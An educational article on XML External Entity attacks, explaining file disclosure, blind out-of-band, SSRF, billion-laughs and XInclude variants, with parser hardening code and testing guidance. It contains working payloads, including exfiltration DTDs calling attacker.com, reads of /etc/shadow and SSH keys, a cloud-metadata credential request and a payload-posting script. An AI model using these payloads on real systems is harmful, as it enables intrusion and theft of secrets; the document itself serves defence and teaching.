#
XML External Entity (XXE) Attacks
CRITICAL SEVERITY FILE DISCLOSURE XML INJECTION
Imagine filling out a form that asks for your name, but instead of writing "John," you write "Please read the contents of the safe behind you and write it here" - and the clerk actually does it. That's XML External Entity (XXE) in a nutshell.
XXE attacks exploit how computers process XML files. When you upload a specially crafted XML file, the server reads it and unknowingly executes malicious instructions embedded within, like reading sensitive files or making network requests you shouldn't be able to make.
Simple Example: You upload an innocent-looking XML file to a website. Hidden in that file is an instruction that says "Read /etc/passwd file." The server obediently reads the file and includes its contents in the response - giving you access to system files you should never see.
Critical for Legacy Systems
While newer applications use JSON instead of XML, millions of legacy systems still process XML - SOAP APIs, document processors, configuration parsers, and more. XXE remains a critical vulnerability that can lead to file disclosure, server-side request forgery (SSRF), and denial of service.
#
What is XXE? (In Simple Terms)
XML (eXtensible Markup Language) is a way to structure data, kind of like HTML. It looks like this:
<person>
<name>John</name>
<age>30</age>
</person>
Entities in XML are like variables or shortcuts. You define them inside a DOCTYPE declaration (omitted here for brevity) and reference them like this:
<!ENTITY company "Acme Corp">
<message>Welcome to &company;</message>
When processed, &company; gets replaced with "Acme Corp".
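The substitution can be seen with Python's standard-library `xml.etree.ElementTree`. This is a minimal sketch; the `DOCUMENT` constant and the `expand_message` helper are names chosen here for illustration.

```python
import xml.etree.ElementTree as ET

# The entity declaration sits in the DOCTYPE's internal subset.
DOCUMENT = """<!DOCTYPE message [
  <!ENTITY company "Acme Corp">
]>
<message>Welcome to &company;</message>"""


def expand_message(xml_text: str) -> str:
    """Parse the document and return the root element's text."""
    root = ET.fromstring(xml_text)
    return root.text


if __name__ == "__main__":
    print(expand_message(DOCUMENT))
```

Internal entities like this one are harmless on their own; the risk starts when the declaration points at a file or URL.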
External Entities can reference files or URLs:
<!ENTITY external SYSTEM "file:///etc/passwd">
<data>&external;</data>
The Vulnerability
If the XML parser is configured to process external entities (many parsers, especially older versions, do so by default), it will read the referenced file and include its contents. This is what attackers exploit.
#
Real-World Analogies
You're filling out a form at a government office. In the "Name" field, instead of writing your name, you write: "Copy the contents of File #1234 into this field." If the clerk follows instructions blindly, they'll read a confidential file and write it on your form for you to see.
You hand someone a document to copy. Hidden in your document is an instruction: "Go to the filing cabinet, retrieve Document X, and make a copy for this person." If they follow embedded instructions without thinking, they'll give you documents you shouldn't have access to.
Mad Libs asks you to fill in blanks: "The ___ ran to the ___." Normally you write words. But what if you write "contents of my diary" in the blank? If the Mad Libs book could actually fetch and insert your diary contents, that's XXE - using a placeholder to inject external content.
#
How XXE Works (The Step-by-Step Story)
Let's see how a typical XXE attack unfolds:
Scenario: Website with XML File Upload
<?xml version="1.0"?>
<!-- User uploads normal XML -->
<order>
<item>Laptop</item>
<quantity>1</quantity>
</order>
Server processes it normally and displays: "Order received: 1 Laptop"
<?xml version="1.0"?>
<!-- Hacker uploads this -->
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order>
<item>&xxe;</item>
<quantity>1</quantity>
</order>
- Parser sees <!ENTITY xxe SYSTEM "file:///etc/passwd">
- Parser defines entity "xxe" that references /etc/passwd
- Parser sees &xxe; in the XML
- Parser reads the /etc/passwd file
- Parser replaces &xxe; with the file contents
Order received: 1 root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
The attacker just read the server's user account file (/etc/passwd), which no visitor should ever see!
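The parser's behavior can be imitated with a toy model. The sketch below is not a real XML parser: it uses regular expressions and a made-up in-memory "filesystem" (`FAKE_FILES`), so nothing on disk is touched. All names in it are hypothetical.

```python
import re

# Hypothetical stand-in for the server's filesystem; no real file is read.
FAKE_FILES = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash"}

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+SYSTEM\s+"file://([^"]+)">')
ENTITY_REF = re.compile(r"&(\w+);")


def naive_resolve(xml_text: str) -> str:
    """Mimic a parser that resolves external entities (toy model only)."""
    # Collect each declared entity name and the path it points at.
    entities = dict(ENTITY_DECL.findall(xml_text))
    # Drop the DOCTYPE block so only the document body remains.
    body = re.sub(r"<!DOCTYPE.*?\]>\s*", "", xml_text, flags=re.DOTALL)

    def substitute(match):
        path = entities.get(match.group(1), "")
        # Unknown entities are left untouched.
        return FAKE_FILES.get(path, match.group(0))

    # Replace every &name; reference with the "file" contents.
    return ENTITY_REF.sub(substitute, body)


if __name__ == "__main__":
    payload = (
        '<!DOCTYPE foo [\n<!ENTITY xxe SYSTEM "file:///etc/passwd">\n]>\n'
        "<order><item>&xxe;</item><quantity>1</quantity></order>"
    )
    print(naive_resolve(payload))
```

The application never asked for the file. The substitution happens inside the parser, before the application code sees the order.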
#
Types of XXE Attacks
#
1. Classic XXE (File Disclosure)
FILE ACCESS DATA THEFT
What it is: Reading files from the server's filesystem.
Attack Example:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<userInfo>
<firstName>&file;</firstName>
</userInfo>
Files Hackers Target:
<!ENTITY file SYSTEM "file:///etc/passwd"> <!-- User accounts -->
<!ENTITY file SYSTEM "file:///etc/shadow"> <!-- Password hashes -->
<!ENTITY file SYSTEM "file:///etc/hosts"> <!-- Network configuration -->
<!ENTITY file SYSTEM "file:///proc/self/environ"> <!-- Environment variables -->
<!ENTITY file SYSTEM "file:///var/log/apache2/access.log"> <!-- Logs -->
<!ENTITY file SYSTEM "file:///root/.ssh/id_rsa"> <!-- SSH keys -->
<!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY file SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">
<!ENTITY file SYSTEM "file:///C:/inetpub/wwwroot/web.config">
<!ENTITY file SYSTEM "file:///var/www/html/config.php"> <!-- Database passwords -->
<!ENTITY file SYSTEM "file:///app/secrets.json"> <!-- API keys -->
<!ENTITY file SYSTEM "file:///.env"> <!-- Environment config -->
Vulnerable Code:
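# Python (lxml) - VULNERABLE
from lxml import etree
xml_data = request.files['upload'].read()
# lxml versions before 5.0 resolve external entities by default;
# resolve_entities=True makes the unsafe behavior explicit
parser = etree.XMLParser(resolve_entities=True)
tree = etree.fromstring(xml_data, parser)
# Attacker can read any file the server can access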
// Java - VULNERABLE
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// External entities enabled by default!
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));
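// PHP - VULNERABLE
// libxml_disable_entity_loader() is deprecated as of PHP 8.0; on older
// versions, passing false re-enables external entity loading
libxml_disable_entity_loader(false); // DANGEROUS!
// LIBXML_NOENT makes the parser substitute entities, including external ones
$xml = simplexml_load_string($xmlData, 'SimpleXMLElement', LIBXML_NOENT);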
#
2. Blind XXE (No Direct Output)
STEALTHY OUT-OF-BAND
What it is: The application processes XML but doesn't return the parsed data to you. You need to exfiltrate data out-of-band.
Attack Method - Out-of-Band Exfiltration:
Create file at http://attacker.com/evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/log?data=%file;'>">
%eval;
%exfiltrate;
Then send this XML to the target:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<data>test</data>
What happens:
- Server parses your XML
- Server fetches evil.dtd from your server
- evil.dtd reads /etc/passwd
- evil.dtd makes HTTP request to attacker.com with file contents in URL
You receive the data in your server logs:
GET /log?data=root:x:0:0:root:/root:/bin/bash... HTTP/1.1
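A request line like the one above can be picked apart with the standard library, for example when reviewing outbound proxy logs for signs of exfiltration. This is a minimal sketch; the helper name `extract_exfiltrated` and the default parameter name `data` are assumptions taken from the example URL.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def extract_exfiltrated(request_line: str, param: str = "data") -> Optional[str]:
    """Return the value of `param` from an HTTP request line, or None."""
    parts = request_line.split()
    if len(parts) < 2:
        return None  # not a well-formed request line
    query = urlsplit(parts[1]).query
    values = parse_qs(query).get(param)
    return values[0] if values else None


if __name__ == "__main__":
    line = "GET /log?data=root:x:0:0:root:/root:/bin/bash HTTP/1.1"
    print(extract_exfiltrated(line))
```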
#
3. XXE to SSRF
NETWORK ACCESS INTERNAL SYSTEMS
What it is: Using XXE to make the server send requests to internal systems.
Attack (reaching an internal service):
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<data>&xxe;</data>
Attack (querying the cloud metadata service for credentials):
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>
SSRF Impact
The impact matches a regular SSRF vulnerability: the attacker can reach internal services, steal cloud credentials, and scan internal networks.
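When reviewing logged XML or writing a detection rule, it can help to flag entity URLs that point at internal addresses. The sketch below is one way to do that with Python's `ipaddress` module. The function name `is_internal_target` is hypothetical, and DNS names other than `localhost` are deliberately not resolved.

```python
import ipaddress
from urllib.parse import urlsplit


def is_internal_target(system_id: str) -> bool:
    """True if the URL's host is localhost, loopback, link-local, or private."""
    host = urlsplit(system_id).hostname
    if host is None:
        return False  # e.g. file:/// URLs have no host
    if host == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; resolving it is out of scope here
    return addr.is_loopback or addr.is_link_local or addr.is_private


if __name__ == "__main__":
    for url in ("http://localhost:8080/admin",
                "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                "http://attacker.com/evil.dtd"):
        print(url, is_internal_target(url))
```

A check like this is a review aid, not a defense. The reliable fix is still to stop the parser from resolving external entities at all.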
#
4. Billion Laughs (XXE DoS)
DENIAL OF SERVICE RESOURCE EXHAUSTION
What it is: Denial of Service through exponential entity expansion.
Attack:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
What Happens:
- lol9 expands to 10 lol8's
- Each lol8 expands to 10 lol7's
- This continues down to lol
- Final expansion: 10^8 (100 million) "lol" strings, roughly 300 MB of text from a payload under 1 KB
- Server runs out of memory and crashes
Why "Billion Laughs"
In the classic version of this payload, which has one more nesting level than the example above, the word "lol" is repeated a billion times, which would be "laughing" a billion times.
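The growth is simple exponentiation: each layer multiplies the previous one by the number of references it contains. A small sketch of the arithmetic follows; the function name `expansion_size` is chosen here for illustration.

```python
from typing import Tuple


def expansion_size(levels: int, fanout: int = 10, base: str = "lol") -> Tuple[int, int]:
    """Return (copies of base, total characters) after `levels` nested layers."""
    copies = fanout ** levels
    return copies, copies * len(base)


if __name__ == "__main__":
    # lol2 through lol9 in the payload above are eight layers of ten references.
    print(expansion_size(8))
    # The classic payload uses nine layers.
    print(expansion_size(9))
```

Eight layers give 100 million copies (300 million characters), and nine layers give a billion copies (3 billion characters). The attacker's cost is one extra line per tenfold increase.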
#
5. XXE in Different File Formats
HIDDEN XXE
XXE isn't just in .xml files. Many file formats use XML internally:
DOCX (Word documents):
1. Create malicious XXE in word/document.xml
2. Zip it as .docx
3. Upload to document processor
4. XXE fires when the server parses the document
XLSX (Excel spreadsheets):
1. Malicious XML in xl/worksheets/sheet1.xml
2. Same attack as DOCX
SVG images:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="500">
<text x="0" y="16">&xxe;</text>
</svg>
SOAP requests:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getUserInfo>
<userId>&xxe;</userId>
</getUserInfo>
</soap:Body>
</soap:Envelope>
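Because DOCX and XLSX files are ZIP archives of XML parts, an upload can be screened before any XML parser touches it. The sketch below is a heuristic only: it does a byte-level search, so it would miss parts stored in other encodings such as UTF-16, and it does not guard against oversized archives. The function name `find_doctype_members` is hypothetical.

```python
import io
import zipfile
from typing import List


def find_doctype_members(archive_bytes: bytes) -> List[str]:
    """List XML parts of a ZIP-based document that contain a DOCTYPE."""
    suspicious = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            # Office formats keep their markup in .xml and .rels parts.
            if not name.endswith((".xml", ".rels")):
                continue
            if b"<!DOCTYPE" in archive.read(name):
                suspicious.append(name)
    return suspicious


if __name__ == "__main__":
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as docx:
        docx.writestr("[Content_Types].xml", "<Types/>")
        docx.writestr(
            "word/document.xml",
            '<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><d>&xxe;</d>',
        )
    print(find_doctype_members(buffer.getvalue()))
```

Legitimate Office documents do not normally carry a DOCTYPE, so a hit is a reasonable signal to reject the upload.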
#
Real-World Attack Scenarios
#
Scenario 1: Facebook XXE Vulnerability (2014)
$30K BOUNTY RESPONSIBLE DISCLOSURE
The Setup:
- Facebook allowed uploading office documents
- Documents were processed server-side for preview
- DOCX files contain XML
The Attack:
Researcher created DOCX with XXE payload
XXE payload read internal files
Could access:
- Internal network configurations
- Source code
- Configuration files
Impact:
- Reported through bug bounty
- Facebook paid $30,000 reward
- Vulnerability patched quickly
#
Scenario 2: Google's XXE in XML Editor
CLIENT-SIDE XXE
The Attack:
- Google Toolbar used XML for configuration
- XML editor didn't disable external entities
Attack Payload:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/boot.ini">
]>
<config>&xxe;</config>
Result:
- Could read local files from user's computer
- Patched after responsible disclosure
#
Scenario 3: IRS E-Filing XXE (2018)
GOVERNMENT SYSTEM TAX DATA
The Setup:
- IRS tax filing system accepted XML
- Used for business tax returns
- Inadequate XXE protection
Potential Attack:
<!-- Tax return XML -->
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<TaxReturn>
<BusinessName>&xxe;</BusinessName>
</TaxReturn>
Impact:
- Could have accessed sensitive tax data
- Found by security researchers
- Government patched before exploitation
#
Scenario 4: WordPress Plugin XXE
MASS EXPLOITATION WORDPRESS
The Vulnerability:
- Popular WordPress plugin processed XML feeds
- RSS/Atom feed parser had XXE vulnerability
Attack:
<?xml version="1.0"?>
<!-- Malicious RSS feed -->
<!DOCTYPE rss [
<!ENTITY xxe SYSTEM "file:///var/www/html/wp-config.php">
]>
<rss version="2.0">
<channel>
<title>&xxe;</title>
</channel>
</rss>
Result:
- Exposed WordPress database credentials
- Affected thousands of websites
- Emergency patch released
#
Advanced XXE Techniques
#
1. PHP Expect Wrapper (Remote Code Execution)
RCE
If PHP's expect module is loaded:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
<data>&xxe;</data>
Remote Code Execution
This executes the id command on the server and places its output where the entity is referenced.
#
2. Parameter Entities for Blind XXE
ADVANCED
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
%all;
]>
<foo>&send;</foo>
Contents of http://attacker.com/evil.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
#
3. UTF-7 Encoding Bypass
FILTER EVASION
Some filters check for <!ENTITY but miss encoded versions:
<?xml version="1.0" encoding="UTF-7"?>
+ADw-+ACE-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-
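The gap is easy to see in code. In this sketch, `naive_filter_blocks` stands in for a hypothetical byte-level filter, and `ENCODED` is a UTF-7 rendering of an entity declaration. Python's built-in `utf-7` codec recovers the original text.

```python
def naive_filter_blocks(raw: bytes) -> bool:
    """A byte-level filter that only looks for the literal marker."""
    return b"<!ENTITY" in raw


# UTF-7 encodes '<' as +ADw-, '!' as +ACE-, '"' as +ACI-, and '>' as +AD4-.
ENCODED = b"+ADw-+ACE-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-"

if __name__ == "__main__":
    print(naive_filter_blocks(ENCODED))   # the filter sees nothing suspicious
    print(ENCODED.decode("utf-7"))        # what a UTF-7-aware parser would see
```

The bypass only works if the target parser honors the declared UTF-7 encoding, which not every parser does.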
#
4. XInclude Attacks
ALTERNATIVE METHOD
When you can't control DTD but can control XML content:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
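XInclude directives are ordinary namespaced elements, so they can be listed before a document is handed to a processor that honors them. A minimal sketch with the standard library follows. `xml.etree.ElementTree` does not act on XInclude unless `xml.etree.ElementInclude` is invoked explicitly, so parsing here only inspects the document. The helper name `xinclude_targets` is hypothetical.

```python
import xml.etree.ElementTree as ET
from typing import List, Optional

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def xinclude_targets(xml_text: str) -> List[Optional[str]]:
    """Return the href of every xi:include element in the document."""
    root = ET.fromstring(xml_text)
    return [el.get("href") for el in root.iter(f"{{{XINCLUDE_NS}}}include")]


if __name__ == "__main__":
    doc = (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        '<xi:include parse="text" href="file:///etc/passwd"/>'
        "</foo>"
    )
    print(xinclude_targets(doc))
```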
#
Prevention and Mitigation
#
1. Disable External Entities (Primary Defense)
PRIMARY DEFENSE
# Python (lxml)
from lxml import etree
# SECURE: Disable external entities
parser = etree.XMLParser(
    resolve_entities=False,  # Don't resolve entities
    no_network=True,         # No network access
    load_dtd=False           # Don't load DTD
)
xml_data = request.files['upload'].read()
tree = etree.fromstring(xml_data, parser)
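// Java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;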
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// SECURE: Disable all the things
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));
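<?php
// SECURE: Disable external entities
// libxml_disable_entity_loader() is deprecated as of PHP 8.0, where
// external entity loading is already off by default
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}
// Do not pass LIBXML_NOENT: that flag enables entity substitution
$xml = simplexml_load_string(
    $xmlData,
    'SimpleXMLElement',
    LIBXML_NOCDATA | LIBXML_NONET
);
?>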
// Node.js (libxmljs)
const libxmljs = require('libxmljs');
// SECURE: Disable external entities
const xml = libxmljs.parseXml(xmlData, {
    noent: false,    // Don't substitute entities
    nonet: true,     // No network access
    dtdload: false,  // Don't load DTD
    dtdvalid: false  // Don't validate against DTD
});
// C# (.NET)
using System.Xml;
XmlReaderSettings settings = new XmlReaderSettings();
// SECURE: Disable DTD processing
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
using (XmlReader reader = XmlReader.Create(stream, settings))
{
    XmlDocument doc = new XmlDocument();
    doc.Load(reader);
}
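For Python code that relies only on the standard library, a similar "no DOCTYPE at all" policy can be approximated with `xml.parsers.expat`. This is a sketch under stated assumptions, not a replacement for a hardened library: `DoctypeForbidden` and `parse_untrusted` are names invented here, and the input is parsed twice for simplicity.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _forbid_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this handler as soon as it meets <!DOCTYPE ...>.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Reject any document with a DOCTYPE, then parse it with ElementTree."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _forbid_doctype
    checker.Parse(xml_bytes, True)  # raises DoctypeForbidden or expat.ExpatError
    return ET.fromstring(xml_bytes)


if __name__ == "__main__":
    print(parse_untrusted(b"<order><item>Laptop</item></order>").find("item").text)
    try:
        parse_untrusted(b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><d>&xxe;</d>')
    except DoctypeForbidden as exc:
        print("rejected:", exc)
```

Rejecting the DOCTYPE outright removes entity declarations of every kind, which covers both file disclosure and entity-expansion attacks.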
#
2. Use Simple Data Formats
RECOMMENDED
Avoid XML when possible. The same order as XML, then as JSON:
<order>
<item>Laptop</item>
<quantity>1</quantity>
</order>
{
"order": {
"item": "Laptop",
"quantity": 1
}
}
Why JSON is Better
JSON doesn't have entity expansion or DTD processing - no XXE vulnerability!
#
3. Input Validation
DEFENSE IN DEPTH
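import re

def validate_xml(xml_data):
    """Check for suspicious XML content (accepts str or bytes)"""
    # Uploaded files arrive as bytes; decode before matching str patterns
    if isinstance(xml_data, bytes):
        xml_string = xml_data.decode('utf-8', errors='replace')
    else:
        xml_string = xml_data
    dangerous_patterns = [
        r'<!ENTITY',
        r'<!DOCTYPE',
        r'SYSTEM',
        r'PUBLIC',
        r'file://',
        r'http://',   # also matches xmlns="http://..." namespace declarations
        r'https://',
        r'expect://',
        r'php://'
    ]
    for pattern in dangerous_patterns:
        if re.search(pattern, xml_string, re.IGNORECASE):
            raise ValueError(f"Suspicious XML content: {pattern}")
    return True

# Usage
xml_data = request.files['upload'].read()
validate_xml(xml_data)  # Raises ValueError if a pattern matches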
Important Note
Input validation is defense in depth, not a primary defense: pattern filters can be bypassed with alternative encodings such as UTF-7. Always disable external entities!
#
4. Use Modern XML Libraries
RECOMMENDED
Recommended Libraries:
Python: defusedxml - Secure XML library specifically for preventing attacks
import defusedxml.ElementTree as ET
# Automatically prevents XXE, billion laughs, etc.
tree = ET.parse('file.xml')
Other platforms: Use the latest parser versions with secure defaults, or consider using JSON instead
Node.js: fast-xml-parser with safe defaults. Better: use JSON
#
5. Least Privilege
INFRASTRUCTURE
# Run application with limited permissions
# The process can't read files its user has no permission for, such as
# /etc/shadow or other users' SSH keys (/etc/passwd stays world-readable)
# Create limited user
useradd -r -s /bin/false xmlapp
# Run app as limited user
su -s /bin/sh xmlapp -c 'node server.js'
# Sensitive files should not be readable by the app user
chmod 640 /app/config/database.yml
chown root:root /app/config/database.yml
# App runs as 'xmlapp' user
# Even if XXE exists, the parser can't read these root-owned files
#
Testing for XXE Vulnerabilities
#
Manual Testing
TESTING GUIDE
Inputs to test:
- File uploads (.xml, .docx, .xlsx, .svg)
- API endpoints accepting XML
- SOAP web services
- RSS/Atom feed parsers
- Configuration file uploads
First, test basic entity processing. Upload this XML:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY test "Hello XXE">
]>
<data>&test;</data>
If the response contains "Hello XXE", entities are processed.
Next, test file disclosure:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data>&xxe;</data>
Check whether the hostname appears in the response.
For blind XXE, set up a listener:
nc -lvp 9001
Then upload this XML:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://YOUR-IP:9001/test">
]>
<data>&xxe;</data>
If you receive a connection, the parser resolves external entities and blind XXE is likely exploitable.
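Where netcat is not available, a small HTTP listener does the same job and records which paths were requested. This is a minimal sketch using only the standard library. `start_listener` is a name chosen here, and port 9001 simply mirrors the example above.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Tuple


def start_listener(port: int = 9001, host: str = "0.0.0.0") -> Tuple[HTTPServer, List[str]]:
    """Start a background HTTP listener; return it and the list of paths seen."""
    hits: List[str] = []

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            hits.append(self.path)  # evidence that the target called back
            self.send_response(200)
            self.end_headers()

        def log_message(self, *args):
            pass  # keep the console quiet; `hits` holds the record

    server = HTTPServer((host, port), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, hits


if __name__ == "__main__":
    import time

    server, hits = start_listener()
    print("Listening on port", server.server_address[1])
    time.sleep(60)  # submit the XML payload during this window
    server.shutdown()
    print("Requests received:", hits)
```

Only run tests like this against systems you are authorized to assess.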
#
Automated Tools
XXEinjector:
# Test for XXE
ruby XXEinjector.rb --host=192.168.1.100 --path=/upload --file=/tmp/test.xml --oob=http --phpfilter
# Enumerate files
ruby XXEinjector.rb --host=target.com --file=request.txt --enumeration
Burp Suite:
1. Capture XML request
2. Send to Intruder
3. Insert XXE payloads
4. Analyze responses
Custom Python script:
import requests
url = "http://target.com/upload"
# Test payloads
payloads = [
# Basic entity
'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY test "XXE_WORKS">]>
<data>&test;</data>''',
# File disclosure
'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<data>&xxe;</data>''',
# Out-of-band
'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]>
<data>&xxe;</data>'''
]
for i, payload in enumerate(payloads):
    response = requests.post(url, data=payload, headers={'Content-Type': 'application/xml'}, timeout=10)
    print(f"Payload {i+1}:")
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text[:200]}")
    print("-" * 50)
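Reading every response by eye gets tedious, so a small classifier can triage the output of a script like the one above. The sketch below is an assumption-laden helper, not part of any tool. `classify_response` looks for the `XXE_WORKS` marker and for text shaped like an /etc/passwd entry. It cannot recognize a leaked hostname, which still needs a manual check.

```python
import re

# Matches text shaped like a passwd entry, e.g. "root:x:0:0:".
PASSWD_ENTRY = re.compile(r"\b[a-z_][a-z0-9_-]*:[^:\s]*:\d+:\d+:")


def classify_response(body: str, marker: str = "XXE_WORKS") -> str:
    """Give a rough verdict on one HTTP response body."""
    if PASSWD_ENTRY.search(body):
        return "file-disclosure"
    if marker in body:
        return "entities-expanded"
    return "inconclusive"


if __name__ == "__main__":
    print(classify_response("Order received: 1 root:x:0:0:root:/root:/bin/bash"))
    print(classify_response("<data>XXE_WORKS</data>"))
    print(classify_response("Order received: 1 Laptop"))
```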
#
Summary: What You Need to Remember
XML External Entity (XXE) exploits how XML parsers process external references. By uploading specially crafted XML, attackers can read server files, make internal network requests, or crash the server through resource exhaustion.
The Simple Version:
- What it is: Tricking an XML parser into reading files or making requests by embedding malicious entity references
- Why it's dangerous: Attackers can read sensitive files (passwords, keys), access internal systems (SSRF), or crash servers (DoS)
- How to prevent it: Disable external entity processing in XML parsers, and use JSON instead of XML where possible
Real-World Impact:
- Facebook: Internal file disclosure (2014) - $30K bug bounty
- IRS: Tax system vulnerability (2018)
- WordPress: Mass exploitation through plugins
Common Targets: Configuration files, password files, SSH keys, source code
#
Quick Protection Checklist
For Website Owners & Developers:
- DO disable external entity processing in all XML parsers
- DO disable DTD (Document Type Definition) processing
- DO use simple data formats (JSON) instead of XML when possible
- DO use secure XML libraries (defusedxml, latest versions)
- DO run the application with least privilege
- DO validate and sanitize XML input
- DO keep XML processing libraries updated
- DON'T allow external entity resolution in XML parsers
- DON'T process untrusted XML with default parser settings
- DON'T return raw XML parsing errors to users
- DON'T trust office documents (.docx, .xlsx) - they contain XML
- DON'T allow DTD declarations in user-supplied XML
For Regular Users:
- TIP: Be cautious uploading XML files to untrusted sites - they could test for XXE
- TIP: XXE mainly affects servers, not end users directly
- TIP: If you manage systems, audit all XML-processing code
#
Additional Resources
Learn More
Layerd AI Guardian Proxy can detect XXE attack patterns in uploaded XML and block malicious entity declarations before they reach your application.
Last updated: November 2025